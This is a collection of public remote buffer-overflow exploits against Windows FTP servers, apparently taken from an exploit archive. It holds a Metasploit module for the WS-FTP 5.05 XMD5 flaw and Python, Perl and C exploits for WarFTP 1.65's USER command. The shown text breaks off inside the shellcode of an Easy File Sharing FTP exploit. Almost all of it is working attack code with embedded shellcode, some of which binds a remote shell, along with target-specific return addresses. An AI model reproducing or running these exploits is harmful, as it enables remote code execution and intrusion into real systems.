# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::wsftp_server_505_xmd5;
use base "Msf::Exploit";
use strict;
use Pex::Text;
my $advanced = { };
my $info =
{
'Name' => 'WS-FTP Server 5.05 XMD5 Overflow',
'Version' => '$Revision: 1.0 $',
'Authors' =>
[ 'Jacopo Cervini <acaro [at] jervus.it>',
],
'Arch' => [ 'x86' ],
'OS' => [ 'win32', 'win2000', 'winxp', 'win2003' ],
'Priv' => 0,
'AutoOpts' => { 'EXITFUNC' => 'thread' },
'UserOpts' =>
{
'RHOST' => [1, 'ADDR', 'The target address'],
'RPORT' => [1, 'PORT', 'The target port', 21],
'SSL' => [0, 'BOOL', 'Use SSL'],
'USER' => [1, 'DATA', 'Username', 'ftp'],
'PASS' => [1, 'DATA', 'Password', 'ftp'],
},
'Payload' =>
{
'Space' => 329,
'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x 5c\x2e",
'Keys' => ['+ws2ord'],
},
'Description' => Pex::Text::Freeform(qq{
This module exploits the buffer overflow found in the XMD command
in IPSWITCH WS_FTP Server 5.05.
}),
'Refs' =>
[
['BID', '20076'],
[ 'CVE', '2006-4847' ],
],
'DefaultTarget' => 0,
'Targets' =>
[
['WS-FTP Server 5.05 Universal', 0x1002e636 ], # push esp, ret in LIBEAY32.dll
],
'Keys' => ['wsftp'],
'DisclosureDate' => 'Sep 14 2006',
};
sub new {
my $class = shift;
my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
return($self);
}
sub Exploit {
my $self = shift;
my $target_host = $self->GetVar('RHOST');
my $target_port = $self->GetVar('RPORT');
my $target_idx = $self->GetVar('TARGET');
my $shellcode = $self->GetVar('EncodedPayload')->Payload;
my $target = $self->Targets->[$target_idx];
if (! $self->InitNops(128)) {
$self->PrintLine(" Failed to initialize the NOP module.");
return;
}
my $request = Pex::Text::PatternCreate(676);
$request .= pack("V", $target->[1]);
$request .= $shellcode;
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintLine(' Error creating socket: ' . $s->GetError);
return;
}
my $r = $s->RecvLineMulti(20);
if (! $r) { $self->PrintLine(" No response from FTP server"); return; }
$self->Print($r);
$s->Send("USER ".$self->GetVar('USER')."\n");
$r = $s->RecvLineMulti(10);
if (! $r) { $self->PrintLine(" No response from FTP server"); return; }
$self->Print($r);
$s->Send("PASS ".$self->GetVar('PASS')."\n");
$r = $s->RecvLineMulti(10);
if (! $r) { $self->PrintLine(" No response from FTP server"); return; }
$self->Print($r);
$self->PrintLine(" Attemping to exploit target '".$target->[0]."'...");
$s->Send("XMD5 $request\n");
$r = $s->RecvLineMulti(10);
if (! $r) { $self->PrintLine(" No response from FTP server"); return; }
$self->Print($r);
sleep(2);
return;
}
# [2007-02-19]
21 WarFTP 1.65 (USER) Remote Buffer Overflow Exploit (win2k SP4)
#!/usr/bin/python
# Remote exploit for WarFTP 1.65. Tested on Windows 2000 server SP4 inside
# VMware. A trivially exploitable stack overflow is present in WarFTP which
# can be triggered by sending a long username (>480 bytes) along with the USER
# ftp command. Maybe other commands like PASS might also be affected. I did
# not check though. This exploit binds shell on TCP port 4444 and then
# connects to it
#
# Author shall not bear any responsibility for any screw ups
# Winny Thomas :-)
import os
import sys
import time
import socket
import struct
# alphanumeric portbind shellcode from metasploit
shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49"
shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36"
shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34"
shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41"
shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4c\x36\x4b\x4e"
shellcode += "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x 42\x46\x4b\x58"
shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x58\x45\x54\x4e\x53\x 4b\x48\x4e\x57"
shellcode += "\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x44\x 4a\x51\x4b\x38"
shellcode += "\x4f\x55\x42\x32\x41\x50\x4b\x4e\x49\x44\x4b\x58\x 46\x33\x4b\x58"
shellcode += "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x49\x4e\x4a\x 46\x48\x42\x4c"
shellcode += "\x46\x37\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x 44\x4c\x4b\x4e"
shellcode += "\x46\x4f\x4b\x53\x46\x35\x46\x52\x4a\x42\x45\x57\x 45\x4e\x4b\x48"
shellcode += "\x4f\x45\x46\x52\x41\x30\x4b\x4e\x48\x46\x4b\x38\x 4e\x50\x4b\x54"
shellcode += "\x4b\x48\x4f\x45\x4e\x41\x41\x30\x4b\x4e\x43\x30\x 4e\x32\x4b\x58"
shellcode += "\x49\x48\x4e\x36\x46\x42\x4e\x41\x41\x56\x43\x4c\x 41\x53\x4b\x4d"
shellcode += "\x46\x56\x4b\x38\x43\x54\x42\x43\x4b\x58\x42\x44\x 4e\x30\x4b\x38"
shellcode += "\x42\x47\x4e\x41\x4d\x4a\x4b\x58\x42\x44\x4a\x30\x 50\x55\x4a\x56"
shellcode += "\x50\x48\x50\x34\x50\x30\x4e\x4e\x42\x45\x4f\x4f\x 48\x4d\x48\x36"
shellcode += "\x43\x45\x48\x56\x4a\x46\x43\x53\x44\x33\x4a\x46\x 47\x37\x43\x57"
shellcode += "\x44\x33\x4f\x35\x46\x35\x4f\x4f\x42\x4d\x4a\x36\x 4b\x4c\x4d\x4e"
shellcode += "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x35\x 49\x38\x45\x4e"
shellcode += "\x48\x46\x41\x58\x4d\x4e\x4a\x30\x44\x30\x45\x35\x 4c\x36\x44\x30"
shellcode += "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x50\x45\x4f\x 4d\x4a\x47\x35"
shellcode += "\x4f\x4f\x48\x4d\x43\x35\x43\x45\x43\x55\x43\x45\x 43\x35\x43\x34"
shellcode += "\x43\x55\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x46\x 4a\x36\x41\x41"
shellcode += "\x4e\x45\x48\x36\x43\x45\x49\x58\x41\x4e\x45\x39\x 4a\x56\x46\x4a"
shellcode += "\x4c\x31\x42\x37\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x 4c\x46\x42\x31"
shellcode += "\x41\x55\x45\x55\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x 4d\x4a\x50\x42"
shellcode += "\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x35\x 4f\x4f\x42\x4d"
shellcode += "\x4a\x36\x45\x4e\x49\x54\x48\x58\x49\x44\x47\x55\x 4f\x4f\x48\x4d"
shellcode += "\x42\x55\x46\x35\x46\x35\x45\x35\x4f\x4f\x42\x4d\x 43\x39\x4a\x56"
shellcode += "\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x45\x4f\x4f\x 48\x4d\x45\x45"
shellcode += "\x4f\x4f\x42\x4d\x48\x46\x4c\x36\x46\x56\x48\x36\x 4a\x46\x43\x46"
shellcode += "\x4d\x46\x49\x58\x45\x4e\x4c\x56\x42\x35\x49\x55\x 49\x52\x4e\x4c"
shellcode += "\x49\x38\x47\x4e\x4c\x56\x46\x54\x49\x58\x44\x4e\x 41\x53\x42\x4c"
shellcode += "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x 44\x34\x4e\x32"
shellcode += "\x43\x49\x4d\x48\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x 4b\x4a\x4a\x36"
shellcode += "\x44\x47\x50\x4f\x43\x4b\x48\x41\x4f\x4f\x45\x57\x 46\x34\x4f\x4f"
shellcode += "\x48\x4d\x4b\x45\x47\x55\x44\x55\x41\x45\x41\x35\x 41\x55\x4c\x36"
shellcode += "\x41\x30\x41\x35\x41\x55\x45\x45\x41\x45\x4f\x4f\x 42\x4d\x4a\x56"
shellcode += "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x 48\x4d\x4c\x56"
shellcode += "\x4f\x4f\x4f\x4f\x47\x33\x4f\x4f\x42\x4d\x4b\x38\x 47\x55\x4e\x4f"
shellcode += "\x43\x48\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x 4f\x4f\x42\x4d"
shellcode += "\x4a\x46\x42\x4f\x4c\x48\x46\x50\x4f\x45\x43\x55\x 4f\x4f\x48\x4d"
shellcode += "\x4f\x4f\x42\x4d\x5a\x90\x90\x90\x90\x90\x90\x90\x 90\x90\x90\x90"
def ConnectRemoteShell(target):
connect = "/usr/bin/telnet " + target + " 4444"
os.system(connect)
def ExploitFTP(target):
sockAddr = (target, 21)
tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
tsock.connect(sockAddr)
response = tsock.recv(1024)
# At the time of overflow EBP points to our shellcode
payload = "USER "
payload += "A" * 485
# Point of EIP overwrite. Address of 'call ebp' from user32.dll SP4.
payload += struct.pack("<L", 0x77E14709)
payload += "\x90" * 100
payload += shellcode
payload += "\r\n"
tsock.send(payload)
if __name__ == '__main__':
try:
target = sys.argv[1]
except IndexError:
print 'Usage: %s <target>' % sys.argv[0]
sys.exit(-1)
ExploitFTP(target)
time.sleep(2)
ConnectRemoteShell(target)
# [2007-03-14]
21 WarFTP 1.65 (USER) Remote Buffer Overflow SEH Overflow Exploit
# ================================================== =============================================
# WarFTP 1.65 (USER) Remote Buffer Overflow SEH overflow Exploit
# By Umesh Wanve
# ================================================== =============================================
#
# Date : 15-03-2007
#
# Tested on Windows 2000 SP4 Server English
# Windows 2000 SP4 Professional English
#
# You can replace shellcode with your favourite one :)
#
#
# Well I used different technique here. Rather than overwriting EIP, I used SEH handler overwrite
# method. Preety simple.
#
# Stack ---> buffer === AAAAA.........
# |
# Pointer to next SEH === Short Jump to Hellcode
# |
# SEH Handler === Pop, Pop, Ret (ws2help.dll win2000 sp4)
# |
# NOP Sled === Nop Sled
# |
# Hellcode === Hell.........
#
#
#
#
# P.S: This was written for educational purpose. Use it at your own risk.Author will be not be
# responsible for any damage.
#
# Always Thanks to Metasploit.
#
#================================================= =================================================
#!/usr/bin/perl
use IO::Socket;
#use strict;
# win32_exec - EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
my($shellcode)=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x 49\x49\x49\x49".
"\x49\x49\x49\x49\x49\x49\x49\x37\x49\x49\x49\x49\x 51\x5a\x6a\x42".
"\x58\x50\x30\x41\x31\x42\x41\x6b\x41\x41\x52\x32\x 41\x42\x41\x32".
"\x42\x41\x30\x42\x41\x58\x50\x38\x41\x42\x75\x38\x 69\x79\x6c\x4a".
"\x48\x67\x34\x47\x70\x77\x70\x53\x30\x6e\x6b\x67\x 35\x45\x6c\x4c".
"\x4b\x73\x4c\x74\x45\x31\x68\x54\x41\x68\x6f\x6c\x 4b\x70\x4f\x57".
"\x68\x6e\x6b\x71\x4f\x45\x70\x65\x51\x5a\x4b\x67\x 39\x4c\x4b\x50".
"\x34\x4c\x4b\x77\x71\x68\x6e\x75\x61\x4b\x70\x4e\x 79\x6e\x4c\x4d".
"\x54\x4b\x70\x72\x54\x65\x57\x69\x51\x49\x5a\x46\x 6d\x37\x71\x6f".
"\x32\x4a\x4b\x58\x74\x77\x4b\x41\x44\x44\x64\x35\x 54\x72\x55\x7a".
"\x45\x6c\x4b\x53\x6f\x51\x34\x37\x71\x48\x6b\x51\x 76\x4c\x4b\x76".
"\x6c\x50\x4b\x6e\x6b\x71\x4f\x67\x6c\x37\x71\x68\x 6b\x4c\x4b\x65".
"\x4c\x4c\x4b\x64\x41\x58\x6b\x4b\x39\x53\x6c\x75\x 74\x46\x64\x78".
"\x43\x74\x71\x49\x50\x30\x64\x6e\x6b\x43\x70\x44\x 70\x4c\x45\x4f".
"\x30\x41\x68\x44\x4c\x4e\x6b\x63\x70\x44\x4c\x6e\x 6b\x30\x70\x65".
"\x4c\x4e\x4d\x6c\x4b\x30\x68\x75\x58\x7a\x4b\x35\x 59\x4c\x4b\x4d".
"\x50\x58\x30\x37\x70\x47\x70\x77\x70\x6c\x4b\x65\x 38\x57\x4c\x31".
"\x4f\x66\x51\x48\x76\x65\x30\x70\x56\x4d\x59\x4a\x 58\x6e\x63\x69".
"\x50\x31\x6b\x76\x30\x55\x38\x5a\x50\x4e\x6a\x36\x 64\x63\x6f\x61".
"\x78\x6a\x38\x4b\x4e\x6c\x4a\x54\x4e\x76\x37\x6b\x 4f\x4b\x57\x70".
"\x63\x51\x71\x32\x4c\x52\x43\x37\x70\x42";
my($pointer_to_next_seh)="\xeb\x06\x90\x90"; # Short Jump
my($seh_handler)="\xa9\x11\x02\x75"; #pop, pop, ret
#(ws2help.dll win2000 sp4)
if ($socket = IO::Socket::INET->new(PeerAddr => $ARGV[0],
PeerPort => "21",
Proto => "TCP"))
{
$exploit = "USER ". #Vulnerable Command
("A"x485). #Buffer
"BBBB". #EIP Overwrites here :)
("\x90" x 80). #Garbage
$pointer_to_next_seh.
$seh_handler.
("\x90" x 10).
$shellcode. #ur code
("\x90" x 10).
"\r\n";
print $socket $exploit;
sleep(1);
close($socket);
}
else
{
print "Cannot connect to $ARGV[0]:21\n";
}
# [2007-03-15]
21 WarFTP 1.65 (USER) Remote Buffer Overlow Exploit (multiple targets)
#include <stdio.h>
#include <string.h>
#include <winsock.h>
#define VULNSERVER "WAR-FTPD 1.65"
#define VULNCMD "\x55\x53\x45\x52\x20"
#define ZERO '\x00'
#define NOP '\x90'
#define VULNBUFF 485
#define BUFFREAD 128
#define PORT 21
#define LENJMPESP 4
/* ################################################## ###########################
##### #####
##### WARFTP - VERSION 1.65 #####
##### #####
##### WarFTP Username Stack-Based Buffer-Overflow Vulnerability #####
##### #####
##### DESCRIPTION: WarFTP is prone to a stack-based buffer-overflow #####
##### vulnerability because it fails to properly check boundaries #####
##### on user-supplied data before copying it to an insufficiently #####
##### sized buffer. #####
##### #####
##### FUNC VULNERABLE: sprintf(char *buffer, const char *format, argv) #####
##### 0x004044E7: sprintf(0x00ACFB50, "%sCRLF", ExploitBuffer) #####
##### #####
##### AFFECTED VERSION: 1.65 #####
##### USE: warftphack.exe IP_ADDRESS SO_&_SERVICE_PACK [ ESP ADDRESS ] #####
##### SO_&_SERVICE_PACK: #####
##### [0] Microsoft Windows XP Pro Spanish SP0 #####
##### [1] Microsoft Windows XP Pro Spanish SP1 #####
##### [2] Microsoft Windows XP Pro Spanish SP2 #####
##### [3] Microsoft Windows XP Pro English SP0 #####
##### [4] Microsoft Windows XP Pro English SP1 #####
##### [5] Microsoft Windows XP Pro English SP2 #####
##### [6] Microsoft Windows 2000 Pro Spanish SP0 #####
##### [7] Microsoft Windows 2000 Pro Spanish SP1 #####
##### [8] Microsoft Windows 2000 Pro Spanish SP2 #####
##### [9] Microsoft Windows 2000 Pro Spanish SP3 #####
##### [10] Microsoft Windows 2000 Pro English SP0 #####
##### [11] Microsoft Windows 2000 Pro English SP1 #####
##### [12] Microsoft Windows 2000 Pro English SP2 #####
##### [13] Microsoft Windows 2000 Pro English SP3 #####
##### [14] Custom -> JMP ESP ADDRESS #####
##### #####
##### EXAMPLE: warftphack.exe 127.0.0.1 2 #####
##### EXAMPLE2: warftphack.exe 127.0.0.1 14 0x776EDDFF #####
##### #####
##### AUTOR: niXel - SYSCODE (SPAIN) #####
##### IDE: Dev-C ver-4.9.9.2 #####
##### COMPILER: MinGW #####
##### DEPENDENCES: Linker -> libwsock32.a #####
##### MAIL: [email protected] #####
##### #####
################################################## ###########################
CAUTION: USER command vulnerable => no send \x40 (@) char into shellcode (user@host)
no send \x0A (\n) char into shellcode
no send \x0D (\r) char into shellcode
FUNCTION sprintf => no send \x00 (\0) char into shellcode
############################ BINDSHELLCODE ##############################
[7777] */
char syscode[] =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x 49\x49\x49\x49"
"\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x49\x 51\x5a\x6a\x61"
"\x58\x30\x42\x31\x50\x42\x41\x6b\x41\x41\x71\x32\x 41\x42\x41\x32"
"\x42\x41\x30\x42\x41\x58\x38\x41\x42\x50\x75\x6d\x 39\x4b\x4c\x32"
"\x4a\x5a\x4b\x50\x4d\x6d\x38\x6b\x49\x49\x6f\x59\x 6f\x39\x6f\x35"
"\x30\x6c\x4b\x70\x6c\x65\x74\x37\x54\x4c\x4b\x42\x 65\x47\x4c\x6e"
"\x6b\x31\x6c\x46\x65\x33\x48\x43\x31\x48\x6f\x6c\x 4b\x70\x4f\x65"
"\x48\x6c\x4b\x73\x6f\x35\x70\x37\x71\x38\x6b\x31\x 59\x4c\x4b\x46"
"\x54\x6e\x6b\x53\x31\x58\x6e\x30\x31\x6f\x30\x4f\x 69\x4e\x4c\x4b"
"\x34\x49\x50\x41\x64\x46\x67\x49\x51\x7a\x6a\x46\x 6d\x43\x31\x48"
"\x42\x5a\x4b\x38\x74\x47\x4b\x30\x54\x64\x64\x51\x 38\x42\x55\x4b"
"\x55\x4e\x6b\x53\x6f\x51\x34\x43\x31\x4a\x4b\x50\x 66\x4e\x6b\x46"
"\x6c\x42\x6b\x4c\x4b\x73\x6f\x75\x4c\x33\x31\x5a\x 4b\x65\x53\x34"
"\x6c\x6e\x6b\x6d\x59\x30\x6c\x57\x54\x55\x4c\x55\x 31\x4b\x73\x74"
"\x71\x69\x4b\x65\x34\x6e\x6b\x43\x73\x74\x70\x6c\x 4b\x67\x30\x46"
"\x6c\x6c\x4b\x70\x70\x67\x6c\x6e\x4d\x6c\x4b\x57\x 30\x44\x48\x71"
"\x4e\x72\x48\x4e\x6e\x50\x4e\x54\x4e\x38\x6c\x70\x 50\x4b\x4f\x4e"
"\x36\x71\x76\x41\x43\x31\x76\x31\x78\x76\x53\x30\x 32\x53\x58\x30"
"\x77\x44\x33\x57\x42\x63\x6f\x70\x54\x6b\x4f\x48\x 50\x73\x58\x58"
"\x4b\x58\x6d\x6b\x4c\x57\x4b\x70\x50\x6b\x4f\x6a\x 76\x71\x4f\x6d"
"\x59\x4b\x55\x65\x36\x6c\x41\x68\x6d\x53\x38\x63\x 32\x42\x75\x51"
"\x7a\x36\x62\x59\x6f\x58\x50\x71\x78\x4a\x79\x34\x 49\x4b\x45\x6e"
"\x4d\x30\x57\x69\x6f\x4e\x36\x52\x73\x41\x43\x62\x 73\x76\x33\x51"
"\x43\x70\x43\x43\x63\x73\x73\x36\x33\x6b\x4f\x4a\x 70\x75\x36\x41"
"\x78\x75\x4e\x71\x71\x35\x36\x42\x73\x4b\x39\x79\x 71\x6c\x55\x70"
"\x68\x4f\x54\x75\x4a\x32\x50\x39\x57\x52\x77\x69\x 6f\x38\x56\x70"
"\x6a\x72\x30\x50\x51\x53\x65\x4b\x4f\x58\x50\x55\x 38\x6c\x64\x4c"
"\x6d\x34\x6e\x49\x79\x66\x37\x6b\x4f\x4e\x36\x50\x 53\x30\x55\x69"
"\x6f\x4a\x70\x53\x58\x7a\x45\x41\x59\x4e\x66\x37\x 39\x36\x37\x69"
"\x6f\x59\x46\x72\x70\x50\x54\x31\x44\x33\x65\x4b\x 4f\x5a\x70\x4f"
"\x63\x51\x78\x38\x67\x50\x79\x38\x46\x43\x49\x32\x 77\x4b\x4f\x4b"
"\x66\x62\x75\x79\x6f\x6a\x70\x45\x36\x30\x6a\x52\x 44\x30\x66\x41"
"\x78\x32\x43\x72\x4d\x6f\x79\x6d\x35\x62\x4a\x42\x 70\x70\x59\x74"
"\x69\x5a\x6c\x6c\x49\x6b\x57\x41\x7a\x32\x64\x6b\x 39\x68\x62\x30"
"\x31\x6f\x30\x6b\x43\x6e\x4a\x6b\x4e\x51\x52\x34\x 6d\x49\x6e\x62"
"\x62\x36\x4c\x5a\x33\x6c\x4d\x71\x6a\x65\x68\x6e\x 4b\x4c\x6b\x4e"
"\x4b\x55\x38\x30\x72\x59\x6e\x4c\x73\x37\x66\x4b\x 4f\x30\x75\x63"
"\x74\x39\x6f\x6e\x36\x33\x6b\x36\x37\x72\x72\x31\x 41\x31\x41\x46"
"\x31\x50\x6a\x55\x51\x31\x41\x41\x41\x32\x75\x42\x 71\x39\x6f\x48"
"\x50\x50\x68\x6c\x6d\x39\x49\x45\x55\x78\x4e\x30\x 53\x39\x6f\x6b"
"\x66\x62\x4a\x79\x6f\x39\x6f\x47\x47\x39\x6f\x58\x 50\x4e\x6b\x50"
"\x57\x4b\x4c\x6c\x43\x4b\x74\x70\x64\x6b\x4f\x6a\x 76\x41\x42\x49"
"\x6f\x58\x50\x30\x68\x68\x6f\x6a\x6e\x4b\x50\x31\x 70\x42\x73\x49"
"\x6f\x58\x56\x49\x6f\x78\x50\x61";
int main(int argc, char ** argv) {
char buffRead[BUFFREAD], jmpESP[LENJMPESP], ch, ch2;
char * pbuffSend;
unsigned int err = 0, i, k;
int sockData, j;
struct sockaddr_in their_addr;
WSADATA wsaData;
system("cls");
fprintf(stdout, "\n\tWarFTP Username Stack-Based Buffer-Overflow Vulnerability\n");
fprintf(stdout, " __________________________________________________ __________________\n\n");
if (((argc == 3) && (atoi(argv[2]) >= 0) && (atoi(argv[2]) < 14)) || ((argc == 4) && (atoi(argv[2]) == 14))) {
if (WSAStartup(MAKEWORD(2, 0), &wsaData) == 0) {
if ((sockData = socket(AF_INET, SOCK_STREAM, 0)) != -1) {
/* Server data struct */
their_addr.sin_family = AF_INET; // ; Family AF_INET
their_addr.sin_addr.s_addr = inet_addr(argv[1]); // ; IP Address = Argv[1]
their_addr.sin_port = htons(PORT); // ; Port = 21
memset(&(their_addr.sin_zero), '0', 8); // ; IP:Port = Argv[1]:21
if (connect(sockData, (struct sockaddr *) &their_addr, sizeof(struct sockaddr)) != -1) {
recv(sockData, buffRead, BUFFREAD, 0);
buffRead[BUFFREAD - 1] = ZERO;
if (strstr(buffRead, VULNSERVER) != NULL) {
/* ################################################## ###############################
##### BufferSend -> "USER A*VULNBUFF @JMP_ESP \x90\x90\x90\x90 SYSCODE \r\n #####
################################################## ############################### */
pbuffSend = (char *) malloc(strlen(VULNCMD) + VULNBUFF + LENJMPESP + (sizeof(char) * 4) + strlen(syscode) + (sizeof(char) * 2));
if (pbuffSend != NULL) {
for (i=0; i < strlen(VULNCMD); i++) *(pbuffSend + i) = VULNCMD[i];
for (j=0; j < VULNBUFF; i++, j++) *(pbuffSend + i) = '\x41';
/* - OPcodes from ntdll.dll -> JMP ESP - */
switch(atoi(argv[2])) {
case 0: memcpy(jmpESP, "\xE3\x39\xF4\x77", LENJMPESP); break;
case 1: memcpy(jmpESP, "\x0F\x98\xF8\x77", LENJMPESP); break;
case 2: memcpy(jmpESP, "\xED\x1E\x95\x7C", LENJMPESP); break;
case 3: memcpy(jmpESP, "\xE3\x39\xF4\x77", LENJMPESP); break;
case 4: memcpy(jmpESP, "\xCC\x59\xFA\x77", LENJMPESP); break;
case 5: memcpy(jmpESP, "\xED\x1E\x95\x7C", LENJMPESP); break;
case 6: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", LENJMPESP); break;
case 7: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", LENJMPESP); break;
case 8: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", LENJMPESP); break;
case 9: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", LENJMPESP); break;
case 10: memcpy(jmpESP, "\x8B\x94\xF8\x77", LENJMPESP); break;
case 11: memcpy(jmpESP, "\xAB\x67\xF9\x77", LENJMPESP); break;
case 12: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", LENJMPESP); break;
case 13: memcpy(jmpESP, "\xFF\xFF\xFF\xFF", LENJMPESP); break;
case 14:
k = 0;
if ((strncmp(argv[3], "0x", (sizeof(char) * 2)) == 0) && (strlen(argv[3]) == 10)) {
for (j=(sizeof(char) * 8) - 1; ((j >= 0) && (!err)); j--) {
ch = *(argv[3] + j + 2);
if (((ch > 47) && (ch < 58)) || ((ch > 64) && (ch < 71)) || ((ch > 96) && (ch < 103))) {
if ((ch > 47) && (ch < 58)) ch -= 48;
else if ((ch > 64) && (ch < 71)) ch -= 55;
else ch -= 87;
if ((j % 2) == 0) jmpESP[k++] = ((ch <<= 4) | ch2);
else ch2 = ch;
}
else { fprintf(stderr, "\t[ ERROR ] Three parameter syntax error\n\t[ ERROR ] Example: 0xFFFFFFFF\n"); err = 1; }
}
}
else { fprintf(stderr, "\t[ ERROR ] Three parameter syntax error\n\t[ ERROR ] Example: 0xFFFFFFFF\n"); err = 1; }
}
if (!err) {
for (j=0; j < LENJMPESP; i++, j++) *(pbuffSend + i) = jmpESP[j];
for (j=0; j < (sizeof(char) * 4); i++, j++) *(pbuffSend + i) = NOP;
for (j=0; j < strlen(syscode); i++, j++) *(pbuffSend + i) = syscode[j];
memcpy(pbuffSend + i, "\r\n", (sizeof(char) * 2));
if (i == send(sockData, pbuffSend, ++i, 0)) {
fprintf(stdout, "\t[ OK ] Exploit buffer send to %s:%d\n", argv[1], PORT);
fprintf(stdout, "\t[ OK ] If you have not chosen a correct operating system and\n\t service pack you can cause a D.O.S\n");
fprintf(stdout, "\t[ OK ] Connect: telnet %s 7777\n", argv[1]);
}
else fprintf(stderr, "\t[ ERROR ] No sending all exploit buffer\n");
}
free(pbuffSend);
}
else fprintf(stderr, "\t[ ERROR ] No allocate memory\n");
}
else fprintf(stderr, "\t[ ERROR ] Not a vulnerable server\n");
}
else fprintf(stderr, "\t[ ERROR ] Connect to %s:%d\n", argv[1], PORT);
closesocket(sockData);
}
else fprintf(stderr, "\t[ ERROR ] Create local socket\n");
WSACleanup();
}
else fprintf(stderr, "\t[ ERROR ] Load library");
}
else {
fprintf(stderr, " [ + ] USE: %s IP_ADDRESS SERVICE_PACK [ ESP_ADDRESS ]\n\n", argv[0]);
fprintf(stderr, " [ + ] SERVICE PACK: [ - ] Microsoft Windows XP Pro Spanish SP0 (0)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro Spanish SP1 (1)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro Spanish SP2 (2)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro English SP0 (3)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro English SP1 (4)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows XP Pro English SP2 (5)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro Spanish SP0 (6)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro Spanish SP1 (7)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro Spanish SP2 (8)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro Spanish SP3 (9)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro English SP0 (10)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro English SP1 (11)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro English SP2 (12)\n");
fprintf(stderr, "\t\t\t[ - ] Microsoft Windows 2000 Pro English SP3 (13)\n");
fprintf(stderr, "\t\t\t[ - ] Custom Service Pack - JMP %%ESP (14)\n\n");
fprintf(stderr, " [ + ] EXAMPLE: %s 127.0.0.1 2\n", argv[0]);
fprintf(stderr, " [ + ] EXAMPLE2: %s 127.0.0.1 14 0x776EDDFF\n", argv[0]);
}
fprintf(stdout, " __________________________________________________ _________________\n\n");
return 0;
}
// [2007-03-25]
21 Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit (Win2K SP4)
#!/usr/bin/python
# Remote exploit for Easy File Sharing FTP server V2.0. The vulnerability
# was discovered by h07 and a POC for windows XP SP2 (polish version) was
# provided. This exploit was tested on windows 2000 server SP4. The exploit
# binds a shell on TCP port 4444.
#
# Author shall bear no responsibility for any screw ups
# Winny Thomas :-)
import os
import sys
import time
import struct
import socket
shellcode = "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x 49\x49\x49\x49"
shellcode += "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x 41\x30\x42\x36"
shellcode += "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x 44\x42\x48\x34"
shellcode += "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x 30\x41\x44\x41"
shellcode += "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x 4c\x56\x4b\x4e"
shellcode += "\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x 42\x46\x4b\x48"
shellcode += "\x4e\x56\x46\x42\x46\x42\x4b\x48\x45\x34\x4e\x33\x 4b\x38\x4e\x37"
shellcode += "\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x38\x4f\x54\x 4a\x31\x4b\x38"
